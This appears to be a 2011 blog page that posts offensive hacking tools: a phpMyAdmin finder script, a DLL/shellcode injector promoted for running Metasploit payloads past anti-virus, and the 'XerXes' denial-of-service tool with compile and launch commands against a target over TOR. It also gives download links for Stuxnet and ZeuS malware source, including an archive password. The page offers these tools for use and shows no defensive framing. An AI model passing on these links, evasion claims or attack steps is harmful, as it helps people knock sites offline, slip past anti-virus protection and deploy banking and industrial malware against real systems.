Sunday, 17. July 2011
PHPmyadmin Finder - Perl
This is a simple perl script that enumerates various possible directories on a given website in order to determine whether or not a phpMyAdmin instance may be installed.

Source
http://pastebin.com/1cbN2Yfm

Permalink

 


Tuesday, 12. July 2011
Syringe - Dll/Shellcode Injection Tool C/C++
Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec) https://github.com/inquisb/shellcodeexec/. It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included).


Sorce Code

http://pastebin.com/pu76ixSH

Permalink

 


Monday, 11. July 2011
XerXes C/C++ - Linux
XerXes is one of the most powerful private dos tool

Source Code
http://pastebin.com/eLrQXTnu

Info
http://vimeo.com/17268609

Platform: Linux
Instructions for use: Save that as xerxes.c
then in terminal: gcc xerxes.c -o xerxes
Followed by ./xerxes www.target.com 80
Ensure TOR is running and on the port in the source, feel free to edit that in the source to match your port.

Permalink

 


Monday, 4. July 2011
Stuxnet Source Code C&C++
Stuxnet is designed to programmatically alter Programmable Logic Controllers (PLCs) used in those facilities. In an ICS environment, the PLCs automate industrial type tasks such as regulating flow rate to maintain pressure and temperature controls.

Download:
http://www.multiupload.com/BDNYSCY5PC

http://youtu.be/7g0pi4J8auQ

Permalink

 


Thursday, 30. June 2011
ZeuS Source Code
http://krash.in/real2/zeus.rar
http://www.multiupload.com/MOWVIFKEOC

Password: zeus

Permalink

 


Stuxnet Decompiled Source code Dump
Download
https://github.com/Laurelai/decompile-dump/tree/master/output

Permalink